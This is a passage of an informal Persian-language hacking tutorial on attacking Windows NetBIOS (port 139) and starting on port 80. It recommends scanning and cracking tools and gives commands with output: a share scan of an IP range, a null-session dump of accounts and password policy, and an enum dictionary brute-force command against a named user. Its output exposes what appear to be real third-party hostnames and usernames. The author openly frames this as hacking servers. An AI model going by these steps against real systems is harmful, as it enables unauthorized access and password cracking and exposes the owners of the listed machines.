اين برنامه را از اينجا داون‌لود کنيد. اين برنامه دقيقا معادل nbtstat است ولي با اين تفاوت که مي‌تونه تعداد زيادي ip رو همزمان تست کنه و ليست share ها رو بدست بياره. اين دقيقا راه‌حلي است براي سوالي که خيلي از شما دوستان پرسيده بودين. مثلا اگه بنويسم:

nbtscan -v -s : 195.219.49.0-30

که ليست اشتراک‌ها رو از ip شماره 195.219.49.0 تا 195.219.49.30 بدست مياره. جواب مي‌شنوم:

195.219.49.1    Recvfrom failed: Connection reset by peer

195.219.49.5    Recvfrom failed: Connection reset by peer

195.219.49.6    Recvfrom failed: Connection reset by peer

195.219.49.7    Recvfrom failed: Connection reset by peer

195.219.49.8    Recvfrom failed: Connection reset by peer

195.219.49.12   Recvfrom failed: Connection reset by peer

195.219.49.23:MRS.ZADE       :00U

195.219.49.23:ATINET_MRA     :00G

195.219.49.23:MRS.ZADE       :03U

195.219.49.23:MAC:44-45-53-54-00-00

195.219.49.28:MAC:44-45-53-54-00-00

195.219.49.26:KIYARASH-R96L0K:00U

195.219.49.26:KIYARASH-R96L0K:20U

195.219.49.26:WORKGROUP      :00G

195.219.49.26:WORKGROUP      :1eG

195.219.49.26:MAC:00-53-45-00-00-00

195.219.49.22:FARHANG-ZCT780D:00U

195.219.49.22:FARHANG-ZCT780D:20U

195.219.49.22:WORKGROUP      :00G

195.219.49.22:WORKGROUP      :1eG

195.219.49.22:MAC:00-53-45-00-00-00

195.219.49.29:TESSA          :00U

195.219.49.29:WORKGROUP      :00G

195.219.49.29:TESSA          :03U

195.219.49.29:MAC:44-45-53-54-00-00

195.219.49.25:MAC:44-45-53-54-00-00

در مورد ip هايي که 20U را مي‌بينيد، يعني sharing رو ميشه استفاده کرد.

۳- winfo :
اينم از جمله برنامه‌هايي است که بايد بگم آخر برنامه است!! از اينجا داون‌لود کنيد. البته توانايي تست تعداد زيادي ip رو نداره ولي وقتي يه ip رو تست مي‌کنه همه‌چي شو در رو مي‌کنه. (البته ميشه گفت همه اين کارها رو مي‌شه با enum هم انجام داد ). مثلا من دستور زير را تايپ کردم :

winfo 195.219.49.184 -n -v

و به نتايج زير رسيدم:

Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom

          - http://www.ntsecurity.nu/toolbox/winfo/

Trying to establish null session...

Null session established.

SYSTEM INFORMATION:

 - OS version: 4.0

DOMAIN INFORMATION:

 - Primary domain (legacy): DSG

 - Account domain: TEHRAN

   Warning: Unable to retrieve domain DNS information.

   Reason : Not supported by the remote OS.

PASSWORD POLICY:

 - Time between end of logon time and forced logoff: No forced logoff

 - Maximum password age: 42 days

 - Minimum password age: 0 days

 - Password history length: 0 passwords

 - Minimum password length: 0 characters

LOCOUT POLICY:

 - Lockout duration: 30 minutes

 - Reset lockout counter after 30 minutes

 - Lockout threshold: 0

SESSIONS:

 - Computer: ARTAWILL-V0P1QR

 - User:

LOGGED IN USERS:

 * Administrator

USER ACCOUNTS:

 * Administrator

    - Password age: 666 days

    - Privilege level: Administrator

    - Home directory:

    - Home directory mapped as:

    - Comment: Built-in account for administering the computer/domain

    - Account is: Enabled

    - User can change password: Yes

    - Account is locked out: No

    - Password never expires: Yes

    - The account is: Normal user

    - Logon script path:

    - Full name:

    - User comment:

    - Can log in from workstations: All

    - Last logon to this DC / computer: Mon Mar 03 23:10:23 2003

    - Last logoff from this DC / computer: Tue Dec 11 23:57:37 2001

    - Account expires: Never

    - Max disk space: Unlimited

    - Failed logins in a row to this DC / computer: 0

    - Path to user profile:

    - Password has expired: No

   (This account is the built-in administrator account)

 * Guest

    - Password age: 680 days

    - Privilege level: Guest

    - Home directory:

    - Home directory mapped as:

    - Comment: Built-in account for guest access to the computer/domain

    - Account is: Disabled

    - User can change password: No

    - Account is locked out: No

    - Password never expires: Yes

    - The account is: Normal user

    - Logon script path:

    - Full name:

    - User comment:

    - Can log in from workstations: All

    - Last logon to this DC / computer: None

    - Last logon to this DC / computer: None

    - Account expires: Never

    - Max disk space: Unlimited

    - Failed logins in a row to this DC / computer: 0

    - Path to user profile:

    - Password has expired: No

   (This account is the built-in guest account)

 * TEST

    - Password age: 680 days

    - Privilege level: User

    - Home directory:

    - Home directory mapped as:

    - Comment:

    - Account is: Enabled

    - User can change password: Yes

    - Account is locked out: No

    - Password never expires: No

    - The account is: Normal user

    - Logon script path:

    - Full name:

    - User comment:

    - Can log in from workstations: All

    - Last logon to this DC / computer: None

    - Last logon to this DC / computer: None

    - Account expires: Never

    - Max disk space: Unlimited

    - Failed logins in a row to this DC / computer: 0

    - Path to user profile:

    - Password has expired: Yes

WORKSTATION TRUST ACCOUNTS:

INTERDOMAIN TRUST ACCOUNTS:

SERVER TRUST ACCOUNTS:

SHARES:

 * ADMIN$

    - Type: Special share reserved for IPC or administrative share

    - Remark: Remote Admin

 * IPC$

    - Type: Unknown

    - Remark: Remote IPC

 * C$

    - Type: Special share reserved for IPC or administrative share

    - Remark: Default share

بعدا سعي خواهم کرد که در مورد تک تک اينها بحث کنم براتون. ولي به عنوان مثال در آخرها مي‌تونين، share ها رو ببينيد.

۴- NAT :
اين برنامه را از اينجا داون‌لود کنيد. يکي از مهم‌ترين کاربرد‌هاي اون crack کردن پسورد sharing است ( مثل enum ). براي کار با NAT کافي است، بنويسيد nat و بعد يک فاصله و بعد ip را مي‌نويسيم. حتما تست کنيد و نتيجه رو ببينيد... ( تکليف براي خودتون )

۵- و ...


- ابزارهاي کمکي: ۲- ابزارهاي گرافيکي

۱- netbrute :
اين برنامه را از اينجا داون‌لود کنيد. من از بين ابزارهاي گرافيکي اينو توصيه مي‌کنم اگرچه به اندازه دو نرم‌افزار بعدي مشهور نيست. من نمي‌خوام روش کار با اينو توضيح بدم چون خيلي تابلو‌ ه! ضمنا اين نرم‌افزار داخل خودش يک پورت اسکنر هم داره که خيلي به درد مي‌خوره. حتما حتما حتما داون‌لود کنيد اينو و اونقدر انگولکش کنيد که سر در بيارين ازش. قرار نيست که همي‌چي رو من بهتون بگم !!

۲- Legion :
اگه بگم مشهورترين نرم‌افزار اسکن کردن پورت‌ ۱۳۹ اين نرم‌افزاره، سخن گزافي نيست!! خيلي‌ها کشته مرده اون هستن ولي من زياد ازش خوشم نمي‌آد. اما بايد قبول کرد که کارش واقعا عاليه!!! به هر حال اگه خواستين داول‌لود کنيد، اينجا رو کليک کنيد.

۳- DumpSec يا DumpACL :
اين هم خيلي معروفه. اگه خواستين مي‌تونين از اينجا داون‌لود کنيد.


- آيا چيز ديگه‌اي راجع به اين پورت مونده که بحث نشده باشد؟

بله!
۱- يه نرم‌افزاري هست به اسم pqwak که اين‌طوري که مي‌گن، اگه کامپيوتر مقابل ويندوز ۹۸ باشه، مي‌تونه پسورد اونو سه سوت در بياره. ( اين برنامه از نقطه ضعف ويندوز ۹۸ راجع به netbios استفاده مي‌کنه و اونو exploit مي‌کنه) چون من درسم راجع به هک کردن سرورهاست و نه کلاينت، پس نبايد زياد به درد ما بخوره ( توجه کنيد که ويندوز ۹۸ تو کار کلاينت‌اش هم مونده، چه برسه به اينکه سرور باشه! ). خودتون بگردين و اونو اگه مي‌خواين پيدا کنيد.
۲- ما بحث استفاده از نقاط ضعف پورت‌ها رو هنوز شروع نکرده‌ايم و در مورد پورت ۱۳۹ هم همينطوره. به عنوان مثال روش‌هايي هست که پورت ۱۳۹ رو exploit کنيم و اون مراحلي که توش گير مي‌کرديم رو دور بزنيم.


- نکاتي راجع به enum

خوب قبلا گفتم که enum نرم‌افزار بسيار مهمي در ارتباط با پورت ۱۳۹ است. حالا مي‌خوام دو کاربرد خاص از اونو براتون توضيح بدم:

۱- گرفتن password policy information :
در ويندوزهاي NT مي‌شود يک سري پارامتر رو براي پسوردها ست کرد. مثلا اينکه حداقل طول پسورد و حداکثر اون چقدر باشه و ... براي اينکه اين policy رو بدست بياريد، از سويچ P استفاده مي‌کنيم. مثلا مي‌نويسيم:

enum -P xxx.xxx.xxx.xxx

و جواب مي‌شنوم:

server: xxx.xxx.xxx.xxx

setting up session... success.

password policy:

  min length: none

  min age: none

  max age: 42 days

  lockout threshold: none

  lockout duration: 30 mins

  lockout reset: 30 mins

cleaning up... success.

خودتون که دارين مي‌بينين!

۲- استفاده از روش cracking براي پيدا کردن پسورد:
اگه با NetBIOS کار کرده باشيد، حتما ديديد که بعضي وقت‌ها (خصوصا در مورد سرورها) پسورد از ما سوال ميشه. (پسورد وقتي پرسيده ميشه که بخواهيم، مرحله ۴ رو از بالا انجام بديم). وقتي پسورد نداشته باشيد، کاري نمي‌تونيد بکنيد. پس ما کاري که مي‌کنيم، اينه که يک سري پسورد را توسط enum تست مي‌کنيم که يکي جواب بده - يا اينکه نده !
اصولا تست کردن تعداد زيادي پسورد براي پيدا کردن پسورد درست رو crack کردن پسورد به روش brute force يا bf مي‌گن ( اين bf رو با اون bf اشتباه نگيريد!! ). البته استفاده از روش bf مختص NetBIOS نيست و خيلي جاها استفاده ميشه. اينم بگم که استفاده از روش bf يه کمي کلاس کار شما رو به عنوان هکر پايين مياره...
حالا چيري مي‌خوايم، يک فايل بزرگ از پسوردهايي است که معمولا مردم استفاده مي‌کنن. براي پيدا کردن اين فايل‌ها که اصطلاحا dictionary file ناميده مي‌شوند به صورت زير است:
الف) استفاده از ديکشنري‌هاي آماده مثل The Argon که مشهورترين ديکشنري کرکينگ مي‌باشد با حجمي حدود ۲۴ مگابايت!
ب) بعضي وقت‌ها خودمون مي‌خواهيم يه ديکشنري بسازيم، در اين موارد کاري که مي‌کنيم اينه که از نرم‌افزارهاي سازنده ديکشنري استفاده مي‌کنيم. مثلا وقتي که شما مي‌دونيد که فلاني از پسوردهاي ۸ حرفي استفاده مي‌کنه و ... براي اين‌کار نرم‌افزارهاي زيادي هست که چند نمونه مهمش عبارتند از: DCM 2.0 و DICTIONARY MAKER و PASSLIST.TXT GENERATOR و ...

حالا که يه فايل ديکشنري دارم مي‌تونم کار کرک پسورد NetBIOS رو شروع کنم. فرض کنيد که وقتي مي‌خوام Ali رو در يک ip به شماره xxx.xxx.xxx.xxx رو با يک فايل ديکشنري به اسم theargon.lst کرک کنيم. دستوري که براي اين‌کار استفاده مي‌کنيم، اينه:

enum -D -f "theargon.lst" -u "Ali" xxx.xxx.xxx.xxx

پورت ۸۰ چيست؟

پورت ۸۰ يکی از مهم‌ترين پورت‌هاست. دنيای وب (صفحات اينترنتی) بر اساس همين پورت کار می‌کنه. توضيح اينکه وقتی به يه سايت وصل می‌شيم و صفحه وب را درخواست می‌کنيم، در واقع مرورگر اينترنتی به پورت ۸۰ اون کامپيوتر وصل می‌شه و اطلاعات رو می‌گيره (البته بعد از گرفتن اطلاعات اون رو تفسير می‌کنه و به صورت يه صفحه نشون می‌ده - دقت کنيد که اطلاعات در واقع به صورت يک سری تگ HTML است ).


- با پورت ۸۰ صحبت کنيم

حالا ما می‌خواهيم با پورت ۸۰ يک کامپيوتر صحبت کنيم ولی به کمک telnet و nc.
اول بايد يه connection (اتصال) با پورت ۸۰ برقرار کنيم (مثلا برای سايت hotmail.com بايد بنويسم):